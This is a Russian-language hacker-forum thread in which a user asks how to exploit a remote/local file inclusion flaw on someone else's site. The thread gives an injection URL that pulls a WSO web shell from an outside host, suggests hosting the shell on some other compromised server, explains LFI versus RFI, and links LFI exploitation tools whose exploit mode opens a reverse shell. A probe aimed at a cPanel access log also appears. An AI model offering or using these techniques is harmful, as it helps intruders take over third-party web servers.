httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк) httр://уязвимый-сайт/?переменная=http://localhost/WSO.php Так подействует или нужен сайт с доменом ? Spoiler: Скриншот https://s8.hostingkartinok.com/uploads/images/2017/11/ec23d9a2066422d7731019fdf5538e78.png
на локалхосте не подействует найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI
на скрине у тебя LFI а не RFI http://insafety.org/lfi.php локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
Эксплоиты или софт есть под эксплуатацию LFI не знаешь ? под win желательно не знаешь ? я один нашёл но он для линукса
https://github.com/D35m0nd142/Kadabra http://kaoticcreations.blogspot.co.uk/2011/08/automated-lfirfi-scanning-exploiting.html https://github.com/D35m0nd142/LFISuite https://github.com/OsandaMalith/LFiFreak
Выбрал скан указал месте славоря, всё правильно сделал ? Spoiler: Фото https://s8.hostingkartinok.com/uploads/images/2017/11/a8431ba4405e1d3b9805c9ff8c2aaa5b.png
Дал ссылку пишет что уязвимый только вот не чем не отличается от других ссылок, в чём прикол ? http://www.site.ru/search?q=/usr/local/cpanel/logs/access_log И ещё не до конца понимаю что значит 1) Exploiter 2) Scanner типа 1 это эксплуатация, а 2 это сканер
Exploiter пробует установить reverse shell По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так